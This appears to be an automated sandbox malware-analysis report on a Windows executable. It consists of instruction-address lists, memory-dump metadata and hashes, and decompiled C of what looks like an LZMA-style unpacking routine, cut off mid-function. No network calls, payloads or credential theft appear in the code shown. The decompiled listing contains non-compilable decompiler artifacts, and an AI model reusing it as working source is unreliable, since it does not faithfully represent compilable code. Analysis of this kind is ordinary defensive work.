                                                                                0x0040683b
                                                                                0x0040631e
                                                                                0x00406321
                                                                                0x00406327
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x0040632c
                                                                                0x0040632f
                                                                                0x00406332
                                                                                0x00406335
                                                                                0x00406338
                                                                                0x0040633b
                                                                                0x0040633c
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x00406341
                                                                                0x00406344
                                                                                0x00406347
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634d
                                                                                0x0040634f
                                                                                0x0040634f
                                                                                0x00406352
                                                                                0x00406352
                                                                                0x00406352
                                                                                0x00405e28
                                                                                0x00405e28
                                                                                0x00405e31
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e37
                                                                                0x00000000
                                                                                0x00405e42
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e4b
                                                                                0x00405e4e
                                                                                0x00405e51
                                                                                0x00405e55
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e5b
                                                                                0x00405e5e
                                                                                0x00405e60
                                                                                0x00405e61
                                                                                0x00405e64
                                                                                0x00405e66
                                                                                0x00405e67
                                                                                0x00405e69
                                                                                0x00405e6c
                                                                                0x00405e71
                                                                                0x00405e76
                                                                                0x00405e7f
                                                                                0x00405e92
                                                                                0x00405e95
                                                                                0x00405ea1
                                                                                0x00405ec9
                                                                                0x00405ecb
                                                                                0x00405ed9
                                                                                0x00405ed9
                                                                                0x00405edd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405ecd
                                                                                0x00405ecd
                                                                                0x00405ed0
                                                                                0x00405ed1
                                                                                0x00405ed1
                                                                                0x00000000
                                                                                0x00405ecd
                                                                                0x00405ea7
                                                                                0x00405eac
                                                                                0x00405eac
                                                                                0x00405eb5
                                                                                0x00405ebd
                                                                                0x00405ec0
                                                                                0x00000000
                                                                                0x00405ec6
                                                                                0x00405ec6
                                                                                0x00000000
                                                                                0x00405ec6
                                                                                0x00000000
                                                                                0x00405ee3
                                                                                0x00405ee3
                                                                                0x00405ee7
                                                                                0x00406793
                                                                                0x00000000
                                                                                0x00406793
                                                                                0x00405ef0
                                                                                0x00405f00
                                                                                0x00405f03
                                                                                0x00405f06
                                                                                0x00405f06
                                                                                0x00405f06
                                                                                0x00405f09
                                                                                0x00405f0d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f0f
                                                                                0x00405f15
                                                                                0x00405f3f
                                                                                0x00405f45
                                                                                0x00405f4c
                                                                                0x00000000
                                                                                0x00405f4c
                                                                                0x00405f1b
                                                                                0x00405f1e
                                                                                0x00405f23
                                                                                0x00405f23
                                                                                0x00405f2e
                                                                                0x00405f36
                                                                                0x00405f39
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f7e
                                                                                0x00405f84
                                                                                0x00405f87
                                                                                0x00405f94
                                                                                0x00405f9c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f53
                                                                                0x00405f53
                                                                                0x00405f57
                                                                                0x004067a2
                                                                                0x00000000
                                                                                0x004067a2
                                                                                0x00405f63
                                                                                0x00405f6e
                                                                                0x00405f6e
                                                                                0x00405f6e
                                                                                0x00405f71
                                                                                0x00405f74
                                                                                0x00405f77
                                                                                0x00405f7c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405fa4
                                                                                0x00405fa6
                                                                                0x00405fa9
                                                                                0x0040601a
                                                                                0x0040601d
                                                                                0x00406020
                                                                                0x00406027
                                                                                0x00406031
                                                                                0x00000000
                                                                                0x00406031
                                                                                0x00405fab
                                                                                0x00405faf
                                                                                0x00405fb2
                                                                                0x00405fb4
                                                                                0x00405fb7
                                                                                0x00405fba
                                                                                0x00405fbc
                                                                                0x00405fbf
                                                                                0x00405fc1
                                                                                0x00405fc6
                                                                                0x00405fc9
                                                                                0x00405fcc
                                                                                0x00405fd0
                                                                                0x00405fd7
                                                                                0x00405fda
                                                                                0x00405fe1
                                                                                0x00405fe5
                                                                                0x00405fed
                                                                                0x00405fed
                                                                                0x00405fed
                                                                                0x00405fe7
                                                                                0x00405fe7
                                                                                0x00405fe7
                                                                                0x00405fdc
                                                                                0x00405fdc
                                                                                0x00405fdc
                                                                                0x00405ff1
                                                                                0x00405ff4
                                                                                0x00406012
                                                                                0x00406014
                                                                                0x00000000
                                                                                0x00405ff6
                                                                                0x00405ff6
                                                                                0x00405ff9
                                                                                0x00405ffc
                                                                                0x00405fff
                                                                                0x00406001
                                                                                0x00406001
                                                                                0x00406001
                                                                                0x00406004
                                                                                0x00406007
                                                                                0x00406009
                                                                                0x0040600a
                                                                                0x0040600d
                                                                                0x00000000
                                                                                0x0040600d
                                                                                0x00000000
                                                                                0x00406243
                                                                                0x00406247
                                                                                0x00406265
                                                                                0x00406268
                                                                                0x0040626f
                                                                                0x00406272
                                                                                0x00406275
                                                                                0x00406278
                                                                                0x0040627b
                                                                                0x0040627e
                                                                                0x00406280
                                                                                0x00406287
                                                                                0x00406288
                                                                                0x0040628a
                                                                                0x0040628d
                                                                                0x00406290
                                                                                0x00406293
                                                                                0x00406293
                                                                                0x00406298
                                                                                0x00000000
                                                                                0x00406298
                                                                                0x00406249
                                                                                0x0040624c
                                                                                0x0040624f
                                                                                0x00406259
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004062ad
                                                                                0x004062b1
                                                                                0x004062d4
                                                                                0x004062d7
                                                                                0x004062da
                                                                                0x004062e4
                                                                                0x004062b3
                                                                                0x004062b3
                                                                                0x004062b6
                                                                                0x004062b9
                                                                                0x004062bc
                                                                                0x004062c9
                                                                                0x004062cc
                                                                                0x004062cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406361
                                                                                0x00406365
                                                                                0x0040636c
                                                                                0x0040636f
                                                                                0x00406372
                                                                                0x0040637c
                                                                                0x00000000
                                                                                0x0040637c
                                                                                0x00406367
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406388
                                                                                0x0040638c
                                                                                0x00406393
                                                                                0x00406396
                                                                                0x00406399
                                                                                0x0040638e
                                                                                0x0040638e
                                                                                0x0040638e
                                                                                0x0040639c
                                                                                0x0040639f
                                                                                0x004063a2
                                                                                0x004063a2
                                                                                0x004063a5
                                                                                0x004063a8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406448
                                                                                0x00406448
                                                                                0x0040644c
                                                                                0x004067ea
                                                                                0x00000000
                                                                                0x004067ea
                                                                                0x00406452
                                                                                0x00406455
                                                                                0x00406458
                                                                                0x0040645c
                                                                                0x0040645f
                                                                                0x00406465
                                                                                0x00406467
                                                                                0x00406467
                                                                                0x00406467
                                                                                0x0040646a
                                                                                0x0040646d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040603d
                                                                                0x0040603d
                                                                                0x00406041
                                                                                0x004067ae
                                                                                0x00000000
                                                                                0x004067ae
                                                                                0x00406047
                                                                                0x0040604a
                                                                                0x0040604d
                                                                                0x00406051
                                                                                0x00406054
                                                                                0x0040605a
                                                                                0x0040605c
                                                                                0x0040605c
                                                                                0x0040605c
                                                                                0x0040605f
                                                                                0x00406062
                                                                                0x00406062
                                                                                0x00406065
                                                                                0x00406068
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040606e
                                                                                0x00406074
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040607a
                                                                                0x0040607a
                                                                                0x0040607e
                                                                                0x00406081
                                                                                0x00406084
                                                                                0x00406087
                                                                                0x0040608a
                                                                                0x0040608b
                                                                                0x0040608e
                                                                                0x00406090
                                                                                0x00406096
                                                                                0x00406099
                                                                                0x0040609c
                                                                                0x0040609f
                                                                                0x004060a2
                                                                                0x004060a5
                                                                                0x004060a8
                                                                                0x004060c4
                                                                                0x004060c7
                                                                                0x004060ca
                                                                                0x004060cd
                                                                                0x004060d4
                                                                                0x004060d8
                                                                                0x004060da
                                                                                0x004060de
                                                                                0x004060aa
                                                                                0x004060aa
                                                                                0x004060ae
                                                                                0x004060b6
                                                                                0x004060bb
                                                                                0x004060bd
                                                                                0x004060bf
                                                                                0x004060bf
                                                                                0x004060e1
                                                                                0x004060e8
                                                                                0x004060eb
                                                                                0x00000000
                                                                                0x004060f1
                                                                                0x00000000
                                                                                0x004060f1
                                                                                0x00000000
                                                                                0x004060f6
                                                                                0x004060f6
                                                                                0x004060fa
                                                                                0x004067ba
                                                                                0x00000000
                                                                                0x004067ba
                                                                                0x00406100
                                                                                0x00406103
                                                                                0x00406106
                                                                                0x0040610a
                                                                                0x0040610d
                                                                                0x00406113
                                                                                0x00406115
                                                                                0x00406115
                                                                                0x00406115
                                                                                0x00406118
                                                                                0x0040611b
                                                                                0x0040611b
                                                                                0x0040611b
                                                                                0x00406121
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406123
                                                                                0x00406126
                                                                                0x00406129
                                                                                0x0040612c
                                                                                0x0040612f
                                                                                0x00406132
                                                                                0x00406135
                                                                                0x00406138
                                                                                0x0040613b
                                                                                0x0040613e
                                                                                0x00406141
                                                                                0x00406159
                                                                                0x0040615c
                                                                                0x0040615f
                                                                                0x00406162
                                                                                0x00406162
                                                                                0x00406165
                                                                                0x00406169
                                                                                0x0040616b
                                                                                0x00406143
                                                                                0x00406143
                                                                                0x0040614b
                                                                                0x00406150
                                                                                0x00406152
                                                                                0x00406154
                                                                                0x00406154
                                                                                0x0040616e
                                                                                0x00406175
                                                                                0x00406178
                                                                                0x00000000
                                                                                0x0040617a
                                                                                0x00000000
                                                                                0x0040617a
                                                                                0x00406178
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004061ba
                                                                                0x004061ba
                                                                                0x004061be
                                                                                0x004067c6
                                                                                0x00000000
                                                                                0x004067c6
                                                                                0x004061c4
                                                                                0x004061c7
                                                                                0x004061ca
                                                                                0x004061ce
                                                                                0x004061d1
                                                                                0x004061d7
                                                                                0x004061d9
                                                                                0x004061d9
                                                                                0x004061d9
                                                                                0x004061dc
                                                                                0x004061df
                                                                                0x004061df
                                                                                0x004061e5
                                                                                0x00406183
                                                                                0x00406183
                                                                                0x00406186
                                                                                0x00000000
                                                                                0x00406186
                                                                                0x004061e7
                                                                                0x004061e7
                                                                                0x004061ea
                                                                                0x004061ed
                                                                                0x004061f0
                                                                                0x004061f3
                                                                                0x004061f6
                                                                                0x004061f9
                                                                                0x004061fc
                                                                                0x004061ff
                                                                                0x00406202
                                                                                0x00406205
                                                                                0x0040621d
                                                                                0x00406220
                                                                                0x00406223
                                                                                0x00406226
                                                                                0x00406226
                                                                                0x00406229
                                                                                0x0040622d
                                                                                0x0040622f
                                                                                0x00406207
                                                                                0x00406207
                                                                                0x0040620f
                                                                                0x00406214
                                                                                0x00406216
                                                                                0x00406218
                                                                                0x00406218
                                                                                0x00406232
                                                                                0x00406239
                                                                                0x0040623c
                                                                                0x00000000
                                                                                0x0040623e
                                                                                0x00000000
                                                                                0x0040623e
                                                                                0x00000000
                                                                                0x004064cb
                                                                                0x004064cb
                                                                                0x004064cf
                                                                                0x004067f6
                                                                                0x00000000
                                                                                0x004067f6
                                                                                0x004064d5
                                                                                0x004064d8
                                                                                0x004064db
                                                                                0x004064df
                                                                                0x004064e2
                                                                                0x004064e8
                                                                                0x004064ea
                                                                                0x004064ea
                                                                                0x004064ea
                                                                                0x004064ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004065da
                                                                                0x004065de
                                                                                0x00406600
                                                                                0x00406603
                                                                                0x0040660d
                                                                                0x00000000
                                                                                0x0040660d
                                                                                0x004065e0
                                                                                0x004065e3
                                                                                0x004065e7
                                                                                0x004065ea
                                                                                0x004065ea
                                                                                0x004065ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406697
                                                                                0x0040669b
                                                                                0x004066b9
                                                                                0x004066b9
                                                                                0x004066b9
                                                                                0x004066c0
                                                                                0x004066c7
                                                                                0x004066ce
                                                                                0x004066ce
                                                                                0x00000000
                                                                                0x004066ce
                                                                                0x0040669d
                                                                                0x004066a0
                                                                                0x004066a3
                                                                                0x004066a6
                                                                                0x004066ad
                                                                                0x004065f1
                                                                                0x004065f1
                                                                                0x004065f4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406788
                                                                                0x0040678b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004063c2
                                                                                0x004063c4
                                                                                0x004063cb
                                                                                0x004063cc
                                                                                0x004063ce
                                                                                0x004063d1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004063d9
                                                                                0x004063dc
                                                                                0x004063df
                                                                                0x004063e1
                                                                                0x004063e3
                                                                                0x004063e3
                                                                                0x004063e4
                                                                                0x004063e7
                                                                                0x004063ee
                                                                                0x004063f1
                                                                                0x004063ff
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004066d5
                                                                                0x004066d5
                                                                                0x004066d8
                                                                                0x004066df
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004066e4
                                                                                0x004066e4
                                                                                0x004066e8
                                                                                0x00406820
                                                                                0x00000000
                                                                                0x00406820
                                                                                0x004066ee
                                                                                0x004066f1
                                                                                0x004066f4
                                                                                0x004066f8
                                                                                0x004066fb
                                                                                0x00406701
                                                                                0x00406703
                                                                                0x00406703
                                                                                0x00406703
                                                                                0x00406706
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x0040670c
                                                                                0x0040670c
                                                                                0x00406710
                                                                                0x00406770
                                                                                0x00406773
                                                                                0x00406778
                                                                                0x00406779
                                                                                0x0040677b
                                                                                0x0040677d
                                                                                0x00406780
                                                                                0x00000000
                                                                                0x00406780
                                                                                0x00406712
                                                                                0x00406718
                                                                                0x0040671b
                                                                                0x0040671e
                                                                                0x00406721
                                                                                0x00406724
                                                                                0x00406727
                                                                                0x0040672a
                                                                                0x0040672d
                                                                                0x00406730
                                                                                0x00406733
                                                                                0x0040674c
                                                                                0x0040674f
                                                                                0x00406752
                                                                                0x00406755
                                                                                0x00406759
                                                                                0x0040675b
                                                                                0x0040675b
                                                                                0x0040675c
                                                                                0x0040675f
                                                                                0x00406735
                                                                                0x00406735
                                                                                0x0040673d
                                                                                0x00406742
                                                                                0x00406744
                                                                                0x00406747
                                                                                0x00406747
                                                                                0x00406762
                                                                                0x00406769
                                                                                0x00000000
                                                                                0x0040676b
                                                                                0x00000000
                                                                                0x0040676b
                                                                                0x00000000
                                                                                0x00406407
                                                                                0x0040640a
                                                                                0x00406440
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406573
                                                                                0x00406573
                                                                                0x00406576
                                                                                0x00406578
                                                                                0x00406802
                                                                                0x00000000
                                                                                0x00406802
                                                                                0x0040657e
                                                                                0x00406581
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406587
                                                                                0x0040658b
                                                                                0x0040658e
                                                                                0x0040658e
                                                                                0x0040658e
                                                                                0x00000000
                                                                                0x0040658e
                                                                                0x0040640c
                                                                                0x0040640e
                                                                                0x00406410
                                                                                0x00406412
                                                                                0x00406415
                                                                                0x00406416
                                                                                0x00406418
                                                                                0x0040641a
                                                                                0x0040641d
                                                                                0x00406420
                                                                                0x00406436
                                                                                0x0040643b
                                                                                0x00406473
                                                                                0x00406473
                                                                                0x00406477
                                                                                0x004064a3
                                                                                0x004064a5
                                                                                0x004064ac
                                                                                0x004064af
                                                                                0x004064b2
                                                                                0x004064b2
                                                                                0x004064b7
                                                                                0x004064b7
                                                                                0x004064b9
                                                                                0x004064bc
                                                                                0x004064c3
                                                                                0x004064c6
                                                                                0x004064f3
                                                                                0x004064f3
                                                                                0x004064f6
                                                                                0x004064f9
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x00000000
                                                                                0x0040656d
                                                                                0x004064fb
                                                                                0x00406501
                                                                                0x00406504
                                                                                0x00406507
                                                                                0x0040650a
                                                                                0x0040650d
                                                                                0x00406510
                                                                                0x00406513
                                                                                0x00406516
                                                                                0x00406519
                                                                                0x0040651c
                                                                                0x00406535
                                                                                0x00406537
                                                                                0x0040653a
                                                                                0x0040653b
                                                                                0x0040653e
                                                                                0x00406540
                                                                                0x00406543
                                                                                0x00406545
                                                                                0x00406547
                                                                                0x0040654a
                                                                                0x0040654c
                                                                                0x0040654f
                                                                                0x00406553
                                                                                0x00406555
                                                                                0x00406555
                                                                                0x00406556
                                                                                0x00406559
                                                                                0x0040655c
                                                                                0x0040651e
                                                                                0x0040651e
                                                                                0x00406526
                                                                                0x0040652b
                                                                                0x0040652d
                                                                                0x00406530
                                                                                0x00406530
                                                                                0x0040655f
                                                                                0x00406566
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00406566
                                                                                0x00406479
                                                                                0x0040647c
                                                                                0x0040647e
                                                                                0x00406481
                                                                                0x00406484
                                                                                0x00406487
                                                                                0x00406489
                                                                                0x0040648c
                                                                                0x0040648f
                                                                                0x0040648f
                                                                                0x00406492
                                                                                0x00406492
                                                                                0x00406495
                                                                                0x0040649c
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x0040649c
                                                                                0x00406422
                                                                                0x00406425
                                                                                0x00406427
                                                                                0x0040642a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406189
                                                                                0x00406189
                                                                                0x0040618d
                                                                                0x004067d2
                                                                                0x00000000
                                                                                0x004067d2
                                                                                0x00406193
                                                                                0x00406196
                                                                                0x00406199
                                                                                0x0040619c
                                                                                0x0040619f
                                                                                0x004061a2
                                                                                0x004061a5
                                                                                0x004061a7
                                                                                0x004061aa
                                                                                0x004061ad
                                                                                0x004061b0
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406595
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040659b
                                                                                0x0040659e
                                                                                0x004065a1
                                                                                0x004065a4
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a9
                                                                                0x004065ac
                                                                                0x004065af
                                                                                0x004065b2
                                                                                0x004065b5
                                                                                0x004065b8
                                                                                0x004065b9
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065be
                                                                                0x004065c1
                                                                                0x004065c4
                                                                                0x004065c7
                                                                                0x004065ca
                                                                                0x004065ce
                                                                                0x004065d0
                                                                                0x004065d3
                                                                                0x00000000
                                                                                0x004065d5
                                                                                0x00000000
                                                                                0x004065d5
                                                                                0x004065d3
                                                                                0x00406808
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e37

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c0f73422cf5c70bb773ec63f6271fa2562b798b9954f63d7acaa05e71132ad09
                                                                                • Instruction ID: e317355bcc59d534f785871be682960ac77c6720c4d6e5fca57139cee1025dfa
                                                                                • Opcode Fuzzy Hash: c0f73422cf5c70bb773ec63f6271fa2562b798b9954f63d7acaa05e71132ad09
                                                                                • Instruction Fuzzy Hash: 1B815531D04229CFDF24CFA8C8447AEBBB1FB44305F25856AD856BB281C7789A86DF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405DF5, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E00405DF5(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406847))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
